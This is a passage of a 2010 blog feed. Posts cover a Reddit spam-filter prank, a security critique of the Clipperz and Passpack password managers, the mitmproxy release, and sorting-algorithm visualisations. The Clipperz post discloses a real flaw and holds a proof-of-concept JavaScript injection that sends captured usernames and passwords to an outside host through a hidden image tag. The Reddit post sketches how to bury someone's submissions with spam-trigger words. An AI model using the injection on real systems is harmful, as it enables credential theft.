Reddit","published":"2010-02-28T00:00:00+00:00","updated":"2010-02-28T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/socialmedia\/reddit-story-dos\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/socialmedia\/reddit-story-dos\/","content":"<div class=\"media\">\n    <a href=\"reddit-story-dos.jpg\">\n        <img src=\"reddit-story-dos.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Mallory hates Bob. Bob has a blog about ponies, and Mallory knows that a\nlarge-ish fraction of Bob's traffic comes from the <a rel=\"external\" href=\"http:\/\/www.reddit.com\/r\/ponies\">ponies\nSubreddit<\/a>. If Bob's stories stopped appearing\nthere it would make him sad, and Mallory, the venomous little sadist that he\nis, would rejoice. Here's how Mallory could accomplish the deed:<\/p>\n<ul>\n<li>Watch Bob's blog closely to make sure he's the first to submit Bob's\nposts to Reddit.<\/li>\n<li>Include some words that will trigger the spam-filter in the submission\ntitle. Any combination of \"viagra\" and \"cialis\" will do just fine.<\/li>\n<li>Sit back and cackle evilly.<\/li>\n<\/ul>\n<p>Now Bob's post is sitting in the spam queue on the ponies Subreddit. Since the\npost has already been submitted, the nice users who usually submit Bob's story\ncan't re-submit it to the same Subreddit. Maybe someone will notice and alert a\nmoderator, but by the time they un-ban the story nobody cares because it's\nalready 10 hours old and on page 50 of the \/new queue. Bob thinks nobody loves\nhim, and retires to live out the remainder of his years, sad and lonely, in a\nsmall, unheated hut on a hill outside of town.<\/p>\n<p>In this story, I am Bob, Mallory is some innocent schmuck who submitted my\n<a href=\"https:\/\/corte.si\/posts\/security\/hostproof\/\">last post<\/a> to the programming Subreddit\nwhile they were silently banned (how were they to know, right?), and the small,\nunheated hut is the Aeron chair in front of my desk. The blog about ponies,\nhowever, is entirely fictional.<\/p>\n"},{"title":"Host-proof applications: doing it wrong","published":"2010-02-26T00:00:00+00:00","updated":"2010-02-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/hostproof\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/hostproof\/","content":"<p><b>Please note that the criticism of Clipperz in this post is now out of date -\nthe Clipperz team is clearly very security-focused, and responded quickly to\naddress the concerns raised below. <\/b><\/p>\n<p>Every day I push another bit of my life into the cloud. There was a time when\nall my personal data lived on one or two drives I could actually see, touch, and\nsniff. Now, I don't even run a personal backup anymore - my software is on\nGithub, my emails are with Google and the rest of my personal data is spread\nevenly between Facebook, Twitter and a handful of online productivity tools. I\ndo keep redundant checkouts of the important stuff, but that's really just a\nside-effect of needing to be able to work off-line. The truth is, my house and\nall my gear could sink into the swamp tomorrow, and as long as I have a web\nbrowser and git I'd be back to work the same day. How wonderful...<\/p>\n<p>... but, then again. I think like a devious, malicious cad <a rel=\"external\" href=\"http:\/\/www.nullcube.com\">for a\nliving<\/a>, and where one part of me sees convenience,\nanother sees spooks, privacy violations and unscrupulous monetisation\nopportunities. I can't help but feel we got shafted. We were promised a glorious\ndecentralised future where everyone would be in control of their own data, and\ninstead our lives have been sliced up and warehoused in a small handful of\nall-powerful, opaque silos. The companies running these things all say the same\nthing - \"Trust us!\" - but as data leak follows data leak and privacy violation\nfollows privacy violation, there has to come a time when users decide that\npromises aren't good enough.<\/p>\n<h2 id=\"host-proof-applications\">Host-proof applications<\/h2>\n<p>It turns out that the first tentative steps towards a better way of doing things\nhave already been taken. The broad goal is simple: to design web applications in\nsuch a way that we don't <em>have<\/em> to trust the host. Javascript interpreters are\nfast enough nowadays to do real-world crypto at reasonable speeds, so we can\nencrypt and decrypt data on the client side and store only encrypted data on the\nserver. The server never sees our encryption keys, and if the implementation is\nsecure, couldn't access our data even if it tried.<\/p>\n<p>Two groups of people have pioneered this application development style, under\ntwo different names. As far as I can tell, the idea was first articulated in\n2005 by <a rel=\"external\" href=\"http:\/\/smokey.rhs.com\/web\/blog\/PowerOfTheSchwartz.nsf\/d6plinks\/RSCZ-6C5G54\">Richard\nSchwartz<\/a>,\nand fleshed out on the ajaxpatterns.org wiki under the name <a rel=\"external\" href=\"http:\/\/ajaxpatterns.org\/Host-Proof_Hosting\">host-proof\nhosting<\/a>.  Shortly after that,\n<a rel=\"external\" href=\"http:\/\/clipperz.com\">Clipperz<\/a> floated as the first real-world, commercial\nimplementation of essentially the same idea, but its founders described what\nthey were building as a <a rel=\"external\" href=\"http:\/\/www.clipperz.com\/users\/marco\/blog\/2007\/08\/24\/anatomy_zero_knowledge_web_application\">zero knowledge web\napplication.<\/a>\nReading these manifestos carefully, it seems clear that although their emphases\nare different, their core aims and principles are identical. It's also pretty\nclear that both terms are misnomers. \"Zero-knowledge\" has a specific\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Zero-knowledge_proof\">cryptographic meaning<\/a>\nthat's only peripherally relevant to the broad application design pattern.\nWhat's more, the term is misleading to the layperson, since there's no such\nthing as a \"zero-knowledge\" application, in any real sense. The server\nunavoidably knows quite a lot about the client - the address they're connecting\nfrom, how frequently they connect, what operations they're executing, what\nbrowser they're using, and so on. \"Host-proof hosting\", on the other hand,\nassigns the \"host-proof\" attribute to the wrong end of the pipe. A more accurate\nterm would be <strong>host-proof application<\/strong>, and that's how I'm going to refer to\nthese ideas in the rest of this post.<\/p>\n<p>The pot of gold at the end of this rainbow is to combine the benefits of the\ncloud with strong, host-independent data security guarantees. The possibilities\nare incredibly enticing. I can imagine a cryptographic Facebook where you don't\nneed to trust the host to aggregate the entire world's private data in the\nclear. I can imagine storing medical records and financial data in the cloud\nwhile still allowing people to maintain direct control over who uses the data\nand how. I can imagine a Gmail where everyone uses crypto by default, where\ndecryption and encryption happens right in the browser. Yes, the technical\nobstacles that stand in the way of these dreams are immense, but if we can\nsurmount them a better world lies beyond.<\/p>\n<h2 id=\"two-steps-to-shangri-la\">Two steps to Shangri-la<\/h2>\n<p>Before we look at some real-world applications, I'd like to briefly talk about\ntwo essential elements of a secure host-proof application: client-side security\nand verification. Lets take each of these in turn.<\/p>\n<h3 id=\"1-client-side-security\">1: Client-side security<\/h3>\n<p>Host-proof applications turn the traditional web security model on its head.\nInstead of trying to secure the server from the browser, we have to secure the\nbrowser-side application from the server. In fact, we fundamentally <em>don't\ncare<\/em> about the server side of the equation - the client-side code should be\nsecure no matter what combination of malicious skulduggery happens upstream.\nYes, this does mean that a host-proof app's security hinges on the security of\nthe browser scripting environment, which is undoubtedly one of the most\nsecurity-hostile spaces ever devised by the mind of man. Many sensible people\nwould call it quits right there, but I think we can do a decent job of client\nside security with careful thought.<\/p>\n<h3 id=\"2-verification\">2: Verification<\/h3>\n<p>Once we have a secure client-side application, we need to make the tools and\ninformation available to allow users to actually verify that the code running\nin their browser is secure. This immediately implies that the client-side of\nthe application has to be published somewhere independent for peer review.\nPerhaps surprisingly, we can also conclude that publishing the server code of a\nhost-proof application is a distraction. Spending time verifying the security\nof the server code is a waste of effort, since we must always assume that the\nserver has already been compromised, and is actively malicious.<\/p>\n<p>The next step in the verification process is harder. Every time the user visits\na host-proof application, they are getting a blob of potentially malicious data\nfrom the server. It's vital that there be some mechanism that allows the user\nto check that the code running in their browser matches the code published for\npeer review. One obvious but cumbersome way to do that is to make sure that\nyour entire application is a single, rolled-up blob, and then to simply publish\na checksum.  Although it's a pain in the ass to do, in theory users can\ndownload and verify the application's integrity. In reality, the vast majority\nof users won't ever bother use a verification system this cumbersome, and even\nthose that do won't do so every time. That's not a good reason to give up,\nthough - making this process workable for users is critical if the host-proof\nparadigm is to be viable.<\/p>\n<h2 id=\"how-to-penetration-test-a-host-proof-application\">How to penetration test a host-proof application<\/h2>\n<p>Two characteristic \"game-over\" scenarios follow immediately from these security\nelements. First, we could subvert the verification process to fool the user\ninto using a corrupted application. Second, we could exploit a security hole in\nthe client-side application to execute arbitrary code in the browser. If we can\ndo either of these things, a malicious entity in control of the server could\naccess a user's private data and have their merry way with it. Which would be\nbad. In both these scenarios the server is the attacker - so, where a\ntraditional web app penetration test often revolves around malicious data sent\nby the browser to the server, a host-proof app penetration test focuses on\nmalicious responses from the server to the browser. Of course, there are a\nmyriad of other ways in which the security of a host-proof app can fail - but\nverification and client-side security are the first two hurdles to cross.<\/p>\n<p>At this point, you might be thinking that a tool that lets you tamper with\nserver responses before they hit the browser would be damn handy. Tools like\n<a rel=\"external\" href=\"https:\/\/addons.mozilla.org\/en-US\/firefox\/addon\/966\">TamperData<\/a> let you modify\noutbound requests, but it turns out that extending them to do the same with\ninbound data is non-trivial. Not entirely coincidentally, though, I recently\nreleased a little tool called <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> that does\nthe job just fine. It's an interactive, SSL-capable proxy with a curses\ninterface that sits between your browser and the server, letting you intercept\nand modify requests and responses on the fly.<\/p>\n<p>Let's take mitmproxy for a spin to look at some of the contenders in the\nhost-proof application space.<\/p>\n<h2 id=\"clipperz-facepalm\">Clipperz: facepalm<\/h2>\n<p>First in line is <a rel=\"external\" href=\"http:\/\/www.clipperz.com\">Clipperz<\/a>, a project I've been\nfollowing for a number of years.  The founders - Marco Barulli and Giulio\nCesare Solaroli - were early pioneers of the host-proof application paradigm,\nand as far as I know, were the first to try to make a livelihood by\ncommercialising the idea. To get a flavour for what they're about, I highly\nrecommend <a rel=\"external\" href=\"http:\/\/itc.conversationsnetwork.org\/shows\/detail4283.html\">this\ninterview<\/a> that Jon\nUdell did with Barulli.<\/p>\n<p>Now, lets review the claims that Clipperz makes for itself. Its\n<a rel=\"external\" href=\"http:\/\/www.clipperz.com\/about\">about<\/a> page says:<\/p>\n<blockquote>\n<p>We got used to trust online services with our data (photos, text documents,\nspreadsheets, ...) but Clipperz proves that this is not necessary: users can\nenjoy a web based application without the need to trust the web application\nprovider.<\/p>\n<\/blockquote>\n<p>The <a rel=\"external\" href=\"http:\/\/www.clipperz.com\/support\/user_guide\">user guide<\/a> expands on this:<\/p>\n<blockquote>\n<p>Clipperz simply hosts your encrypted cards and provide you with a nice\ninterface to manage your data, but it could never access the cards in their\nplain form.<\/p>\n<\/blockquote>\n<p>Well, righty oh! That's a very forthright guarantee. Lets see if Clipperz lives\nup to it.<\/p>\n<h3 id=\"1-verification\">1: Verification<\/h3>\n<p>Clipperz takes verification seriously. The entire Clipperz source is\nprominently published for review. They also seem to have architected their\napplication specifically to make checksum verification possible - the\nclient-side comes down the wire as a single blob, with no external\ndependencies. This means that verification really can be as simple as taking a\nchecksum over the application page. They even have <a rel=\"external\" href=\"http:\/\/www.clipperz.com\/reviewing_the_code\/checksums\">instructions that show how\nto do this using wget<\/a>.<\/p>\n<p>There are two important criticisms of the Clipperz verification process. Most\ncritically, they publish the checksums and verification package right on the\nClipperz homepage. If we assume that the server has been compromised, the\nattacker is in control of both the checksums and the app, and we're up the\ncreek. Secondly, although Clipperz has gone to a lot of effort to make the\nprocess easy, verification is still too cumbersome. The vast majority of their\nusers will never bother to verify their client-side at all. Some more\ninnovation is needed from an already very innovative company to make this\nprocess simpler.<\/p>\n<p>All told, though, this is a good effort - with a little bit of extra work,\nClipperz would get a definite \"pass\" for verification.<\/p>\n<h3 id=\"2-client-side-security\">2: Client-side security<\/h3>\n<p>Client-side security is a different story. The moment we look at the traffic\nbetween the client and server, it's immediately clear that something is very,\nvery wrong.  Here's a sample of what comes down the pipe to the client:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">throw<\/span><span style=\"color: #032F62;\"> &#39;allowScriptTagRemoting is false.&#39;<\/span><span>;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">\/\/#DWR-INSERT<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">\/\/#DWR-REPLY<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">var<\/span><span> s0<\/span><span style=\"color: #D73A49;\">=<\/span><span>{};<\/span><span style=\"color: #D73A49;\">var<\/span><span> s1<\/span><span style=\"color: #D73A49;\">=<\/span><span>{};s0.result<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #032F62;\">&quot;done&quot;<\/span><span>;s0.lock<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #032F62;\">&quot;4EB1C567-7FFE-928D-E0C8-11AF8870DE57&quot;<\/span><span>;<\/span><\/span>\n<span class=\"giallo-l\"><span>s1.requestType<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #032F62;\">&quot;MESSAGE&quot;<\/span><span>;s1.targetValue<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #032F62;\">&quot;blahblah&quot;<\/span><span>;s1.cost<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #005CC5;\">2<\/span><span>;<\/span><\/span>\n<span class=\"giallo-l\"><span>dwr.engine.<\/span><span style=\"color: #6F42C1;\">_remoteHandleCallback<\/span><span>(<\/span><span style=\"color: #032F62;\">&#39;5&#39;<\/span><span>,<\/span><span style=\"color: #032F62;\">&#39;0&#39;<\/span><span>,{result:s0,toll:s1});<\/span><\/span><\/code><\/pre>\n<p>Don't let the <strong>throw<\/strong> at the top of the snippet fool you. That gets stripped\noff by the client-side code, and the remainder of the snippet is then run by\nthe client-side application. Yes, folks: Clipperz uses\n<a rel=\"external\" href=\"http:\/\/directwebremoting.org\/dwr\/index.html\">DWR<\/a>, which means that the\nClipperz server sends little chunks of Javascript back to the browser, which\nare then eval-ed in the password manager's context. This means that the\napplication is <em>designed<\/em> to let the supposedly untrusted server execute\narbitrary code in the secure environment that contains your S00P3R S3KR3T data.\nSo all their work to make their application verifiable and all the effort\nexpended to publish their code for review is worth exactly bupkis.<\/p>\n<p>Facepalm.<\/p>\n<p>To prove that this isn't an academic issue, here's a trivial exploit showing\nhow someone in control of the Clipperz server could access a user's private\ndata even if they went to the effort of verifying the application checksum.\n<strong>WARNING:<\/strong> Doing this using your real Clipperz credentials will make your\nusername and password appear in my webserver logs! If you're following along\nwith mitmproxy, you need to set an intercept on responses from Clipperz (\"i\"\nfor intercept, and use the pattern \"~s ~u clipperz\"). And then add the\nfollowing lines of code to the first server response after you click the\n\"login\" button, just below the \"#DWR-REPLY\" marker:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">var<\/span><span> f<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #6F42C1;\"> getElementsByTagAndClassName<\/span><span>(<\/span><span style=\"color: #032F62;\">&quot;input&quot;<\/span><span>,<\/span><span style=\"color: #032F62;\"> &quot;loginFormField&quot;<\/span><span>);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">var<\/span><span> s<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #032F62;\"> &quot;http:\/\/corte.si\/sploit\/&quot;<\/span><span>;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">for<\/span><span> (<\/span><span style=\"color: #D73A49;\">var<\/span><span> i<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #005CC5;\">0<\/span><span>; i<\/span><span style=\"color: #D73A49;\"> &lt;<\/span><span> f.<\/span><span style=\"color: #005CC5;\">length<\/span><span>; i<\/span><span style=\"color: #D73A49;\">++<\/span><span>){s<\/span><span style=\"color: #D73A49;\"> =<\/span><span> s<\/span><span style=\"color: #D73A49;\"> +<\/span><span> f[i].value<\/span><span style=\"color: #D73A49;\"> +<\/span><span style=\"color: #032F62;\"> &quot;::&quot;<\/span><span>;}<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">var<\/span><span> e<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #6F42C1;\"> IMG<\/span><span>({<\/span><span style=\"color: #032F62;\">&quot;src&quot;<\/span><span>: s,<\/span><span style=\"color: #032F62;\"> &quot;height&quot;<\/span><span>:<\/span><span style=\"color: #032F62;\"> &quot;0px&quot;<\/span><span>,<\/span><span style=\"color: #032F62;\"> &quot;width&quot;<\/span><span>:<\/span><span style=\"color: #032F62;\"> &quot;0px&quot;<\/span><span>});<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">appendChildNodes<\/span><span>(<\/span><span style=\"color: #6F42C1;\">$<\/span><span>(<\/span><span style=\"color: #032F62;\">&quot;header&quot;<\/span><span>), e);<\/span><\/span><\/code><\/pre>\n<p>This rough and ready snippet simply adds an invisible image tag to the page,\nwhich loads a bogus image that includes the username and password in the source\npath. Image sources aren't constrained by the same origin policy, so we can\nsend this data wherever we like - in this case, the server my blog is hosted\non. The login process will continue as usual, and unless the user is watching\ntheir network traffic carefully, they'll be none the wiser.<\/p>\n<h2 id=\"don-t-worry-clipperz-passpack-does-it-wrong-too\">Don't worry Clipperz, Passpack does it wrong too<\/h2>\n<p>The other big contender in the host-proof application space is Clipperz'\nslicker-looking rival, <a rel=\"external\" href=\"http:\/\/www.passpack.com\">Passpack<\/a>. A glance at their\nsecurity page shows that they definitely refer to themselves as applying the\n\"host-proof hosting\" pattern. Their <a rel=\"external\" href=\"https:\/\/www.passpack.com\/en\/faq\/\">FAQ<\/a>\nmakes the typical strong security claim:<\/p>\n<blockquote>\n<p><strong>Can Passpack read my passwords?<\/strong><\/p>\n<p>Not even if we wanted to. It's not possible.<\/p>\n<\/blockquote>\n<p>Not possible, eh? Well, lets see.<\/p>\n<h3 id=\"1-verification-1\">1: Verification<\/h3>\n<p>Passpack has completely punted on the verification issue. They don't publish\nany checksums, they don't publish their source, and their application is split\nup into innumerable components that would make verification a nightmare. In a\nblog post <a rel=\"external\" href=\"http:\/\/blog.passpack.com\/2007\/04\/passpack-and-clipperz-the-difference\">comparing themselves with\nClipperz<\/a>,\nthey make clear that this is a conscious choice on their part, not an\noversight. In fact, they level the same criticism at the Clipperz verification\nprocess that I do. Clipperz publishes their verification package right on their\nhomepage:<\/p>\n<blockquote>\n<p>However, if I am in a phished version of Clipperz, it's a moot point because\nthe phisherman can falsify those values as well so that they match his\nspoofed version.<\/p>\n<\/blockquote>\n<p>This misses the point of the checksum somewhat - we're not trying to protect\nagainst phishing, but against a malicious server - but the criticism is valid\nnone the less. Passpack is also right that the Clipperz checksum verification\nprocess is too cumbersome:<\/p>\n<blockquote>\n<p>I just don't think anyone would really do that - always, every single time,\nmany times a day.<\/p>\n<\/blockquote>\n<p>Quite so. But instead of trying compete with Clipperz by doing a better job on\nthese points, Passpack gave up - they only publish a checksum for the offline\nversion of their application. This is a disastrous decision. Passpack users are\ncompelled to execute whatever the server passes them, without any verification\nor review.  If this was a sudden-death match, that would be Passpack pretty\nmuch done right there.<\/p>\n<h3 id=\"2-client-side-security-1\">2: Client-side security<\/h3>\n<p>But even if they <em>did<\/em> have a verification mechanism, it still wouldn't help.\nFiring up mitmproxy, our first look at the traffic seems promising. During the\nlogin process we see JSON snippets - which can be deserialized safely - being\npassed to and fro, rather than chunks of Javascript. Then we notice that the\nnews pane comes through as a chunk of HTML.  When we edit the response to add a\n&lt;script&gt; tag, it gets executed.  Furthermore, when we click on any of the\nmenu buttons, gobs of Javascript are pumped into the client app and merrily\nevaluated. I stopped looking at the application at this point. There's no point\nshowing an example of how someone in control of the server could exploit this\nsituation, because it's clear that preventing script injection is simply not a\ndesign goal of the Passpack project. So, that's 0 for 2 for Passpack.<\/p>\n<h2 id=\"the-emperor-sure-looks-naked-to-me\">The emperor sure looks naked to me<\/h2>\n<p>I want to make it clear that I wish both these projects well. Their founders\nhave thrown their hats into the ring, and had the stones to try to make the\nhost-proof application paradigm work in a commercial setting. Both projects have\npublished significant libraries for building host-proof apps (see the <a rel=\"external\" href=\"http:\/\/www.clipperz.com\/open_source\/javascript_crypto_library\">Clipperz\nJavascript Crypto\nLibrary<\/a>, and the\n<a rel=\"external\" href=\"http:\/\/www.passpack.com\/en\/credits\/\">Passpack Host-Proof Hosting Library<\/a>) that\nwill undoubtedly make the road easier for those who follow in their footsteps.\nIt's in the interest of all freedom-loving citizens of the Internet that both\nthese companies prosper, because we need more host-proof applications, not\nfewer. However...<\/p>\n<p>Without a client-side that is both secure <strong>and<\/strong> verified in the sense I\ndescribe above, an application simply isn't \"host-proof\" in any meaningful\nsense. If your application is designed in such a way that you can simply\n<strong>ask<\/strong> your user's browser for their private data, you can't say \"we couldn't\naccess your data even if we wanted to\", and you can't say \"we've designed our\nsystem so that you don't have to trust us\". Now, I can anticipate some of the\nresponse to this statement - people will say that checksum verification isn't\npractical, that users wouldn't bother, that an application that sticks\nrigorously to the host-proof application principles would be unusable.  This\nmight all be true - but is beside the point. The truth is, if someone hacked\nthe Clipperz or Passpack servers, they <strong>could<\/strong> steal bank details or server\npasswords or whatever else people keep in their lockers - so we're relying on\nthe hosts to be secure. And like Google and Facebook, Clipperz and Passpack\n<strong>could<\/strong> access their users' private data - they're just promising that they\nwon't. Just like everybody else, really.<\/p>\n<p>Luckily, the steps required to fix things are clear. Clipperz made a critical\nmistake in choosing DWR for their client-server communications, but that can be\nrectified. Passpack needs to abandon its misguided idea that no verification of\nthe client-side application is needed, and do the work to make this possible.\nPasspack already uses JSON for most of its communication - if they used it\nconsistently for all server communication, their client-side app could be on\nsolid ground. Both projects need to put on their thinking caps, and come up\nwith a better way to approach the client-side verification problem. I'm hopeful\nthat we'll see improvements from both projects in response to this post.<\/p>\n<h2 id=\"up-next-building-a-minimal-host-proof-application\">Up next: building a minimal host-proof application<\/h2>\n<p>All of this started off the exhaustingly monomaniacal hamster-on-a-wheel that I\nhave where other people have a brain. I found myself awake at 3am, thinking\nabout host-proof apps, and pondering the ineluctable modalities of the\nverification problem. So, I decided to spend some time building a minimal\nuseful host-proof application to experiment with. Tune in next week for my next\nthrilling post, where I build and launch a tiny, experimental and unashamedly\nuser-hostile host-proof app.<\/p>\n"},{"title":"Introducing mitmproxy: an interactive man-in-the-middle proxy","published":"2010-02-16T00:00:00+00:00","updated":"2010-02-16T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_1\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_1\/","content":"<h1> Update: see <a href=\"http:\/\/mitmproxy.org\">mitmproxy.org<\/a> for recent releases!<\/h1>\n<p>I spend a lot of time poking at web interfaces, both for penetration testing\nand generally while developing software. This usually involves iteratively\nmaking small modifications to requests, and running them again and again until\nI find a vulnerability or reproduce a bug. Using a browser plugin like\n<a rel=\"external\" href=\"https:\/\/addons.mozilla.org\/en-US\/firefox\/addon\/966\">tamperdata<\/a> is great for a\nquick first stab at things, but gets clunky quickly.  Scripting things up is\nusually the next step, and that's fine, but time-consuming and not very agile.<\/p>\n<div class=\"media\">\n    <a href=\"mitmproxy-screenshot.png\">\n        <img src=\"mitmproxy-screenshot.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>So, I'm releasing <strong>mitmproxy<\/strong> - an interactive, SSL-aware man-in-the-middle\nproxy that lets you view, modify and replay HTTP connections. It's aimed at\nsoftware developers and penetration testers (i.e. people like me), who need to\nintensively tamper with and monitor HTTP traffic. Using it, you can point your\nbrowser at a page that loads a bazillion images and 50 snippets of JSON, pick\nout the one request you're interested in, and modify and replay it over and\nover. You have complete control over both requests and responses - you can edit\nheaders and content using your preferred text editor, and change HTTP request\nmethods on the fly. You can view request and response contents using an external\nviewer (picked using your mailcap configuration), or using <strong>mitmproxy<\/strong>'s built\nin text and hexdump-like viewers.  Filters and intercepts are specified using\nregular expressions and a pretty complete mutt-like expression language.<\/p>\n<p>Another useful feature is something I call \"sticky cookies\". I often need to\nmake requests using an authenticated session. This is a pain when logins are\naction. Copying cookie values around or scripting up the login process gets old\nquick. So, <strong>mitmproxy<\/strong> lets you set cookies on requests matching a specified\nexpression as \"sticky\", which means that requests without a cookie inherit\npreviously seen cookie values. So, you can log in to the target site once using\nyour browser, and subsequent requests using tools like <strong>curl<\/strong> will\nautomagically look like they're part of an authenticated session.<\/p>\n<p>I've just sliced <strong>mitmproxy<\/strong> raw and quivering out of a much larger internal\nproblems.<\/p>\n<p>You can find releases and documentation for <strong>mitmproxy<\/strong>\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">here<\/a>. As usual, the real action is at the project's\n<a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/mitmproxy\">git repository<\/a>.<\/p>\n"},{"title":"Timsort - a study in grayscale","published":"2010-01-28T00:00:00+00:00","updated":"2010-01-28T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/timsort-grayscale\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/timsort-grayscale\/","content":"<div class=\"media\">\n    <a href=\"timsort.png\">\n        <img src=\"timsort.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>A <a href=\"https:\/\/corte.si\/posts\/code\/sortvis-fruitsalad\/\">couple of days ago<\/a> I published a\nset of explosion-in-a-crayola-factory colourful sorting algorithm\nvisualisations, using a colour sequence generated with the Hilbert curve. The\nidea was that using a space-filling curve to traverse the RGB colour cube we\ncould get a large number of distinct but visually ordered colours. I contrasted\nthis with a more common method, which is to vary the intensity of a monotone to\ngenerate a gradient of colours. A couple of people suggested that I provide a\nset of grayscale images for comparison. I was curious about this too, so I\nhacked a grayscale generator into <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/sortvis\">sortvis<\/a>.\nThe results were striking, but not interesting enough to reproduce here in full.\nSubjectively, I think the coloured images do allow you to follow more of the\ndetail in these dense visualisations, but I'm not wedded to the idea. Being able\nto visually judge the order of elements in a sorting algorithm visualisation is\nimportant, and that is something we sacrifice in the Hilbert RGB traversal. I\nstill like my <a href=\"https:\/\/corte.si\/posts\/code\/visualisingsorting\/\">earlier sparse grayscale\nvisualisations<\/a> best.<\/p>\n<p>If you're curious, you can check out\n<a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/sortvis\">sortvis<\/a> and generate the full set of\ngrayscale graphs with the following command:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>.\/dense -g -n 512<\/span><\/span><\/code><\/pre>\n<p>I did think the grayscale version of Python's\n<a href=\"https:\/\/corte.si\/posts\/code\/timsort\/\">Timsort<\/a> was worth sharing.  It's pretty\nspectacular due to a purely coincidental 3d effect - not much good for\nexplaining Timsort, but I'd hang it on my wall, for sure.<\/p>\n"},{"title":"Hilbert Curve + Sorting Algorithms + Procrastination = ?","published":"2010-01-26T00:00:00+00:00","updated":"2010-01-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/sortvis-fruitsalad\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/sortvis-fruitsalad\/","content":"<p>I like the Hilbert curve. I like sorting algorithm visualisations. I\noccasionally procrastinate when I should be doing more important things. When\nall these factors converge, the result is a post like this.<\/p>\n<p>In a <a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/\">previous post<\/a>, I drew a picture\nof a Hilbert curve by projecting a Hilbert curve traversal of the RGB colour\ncube onto a Hilbert curve traversal of the plane (yes, it's a mouthful, but it's\na mouthful of awesome). Since then, I've been pondering the general utility of\nHilbert curve traversals of the colour cube. In large-scale visualisation, we\noften want to choose an ordered sequence of colours that have the property that\ncolours close to each other on the sequence are also close to each other\nvisually. The easy way to do this is to restrict yourself to a specific hue, and\nto vary the intensity. I used this idea in grayscale to generate some previous\n<a href=\"https:\/\/corte.si\/posts\/code\/visualisingsorting\/\">sorting algorithm visualisations<\/a>:<\/p>\n<div class=\"media\">\n    <a href=\"insertionsort.png\">\n        <img src=\"insertionsort.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Insertion sort\n    <\/div>\n    \n<\/div>\n<p>The problem with this approach is that it hugely restricts the number of\ndistinct colours we can use. There are only so many distinct shades of gray the\nhuman eye can perceive - I'm already pushing it with 20 distinct colours in the\nimage above. We can do much, much better using the Hilbert curve. Lets assume\nthat human perception of RGB colours is uniform and consistent - that is, that\nany change along the RGB axes will result in uniformly proportional difference\nin perceived colour. This assumption is incorrect, but it's good enough as a\nfirst approximation. By traversing the RGB colour cube in Hilbert order, we can\nget a set of colours that are maximally distinct from each other, with\nnear-optimal colour locality preservation (keeping in mind that perfect\nlocality preservation is impossible). In other words, an equidistant sequence\nof colours that are simultaneously as different from each other as possible,\nand where colours 'close' to each other on the sequence are as similar as\npossible. The result is a colour sequence that looks like this:<\/p>\n<div class=\"media\">\n    <a href=\"swatch.png\">\n        <img src=\"swatch.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        512-colour Hilbert-order swatch\n    <\/div>\n    \n<\/div>\n<p>We do, of course, pay a price for this mathematical marvel: we can't visually\ncompare colours and see their order in the spectrum. When we really want a\nlarge ordered sequence of colours, this can be an acceptable tradeoff.<\/p>\n<p>Below is a re-imagining of my previous sorting algorithm visualisations, at a\nmuch larger scale than I could achieve using shades of gray. Each image shows a\nrandom list of 512 elements being sorted. The images are at a 1-pixel per\nelement resolution, and each element has a distinct colour along the Hilbert\nRGB cube traversal. The aspect ratios differ, because the width of the images\nare equal to the number of element swaps that occur during the sorting process.\nI've left out a number of algorithms that end up being too \"wide\" to be\nenjoyable - shellsort and bubblesort, I'm looking at you. Oh, and I make\nabsolutely no claims that these particular visualisations are useful or\ninformative. I made them for the same reason Mallory climbed Everest and the\nchicken crossed the road: because it's there, and to see what's on the other\nside. Come to think of it, the Mallory-Chicken Impetus explains rather a lot of\nwhat I do.<\/p>\n<h3 id=\"selection-sort\">Selection 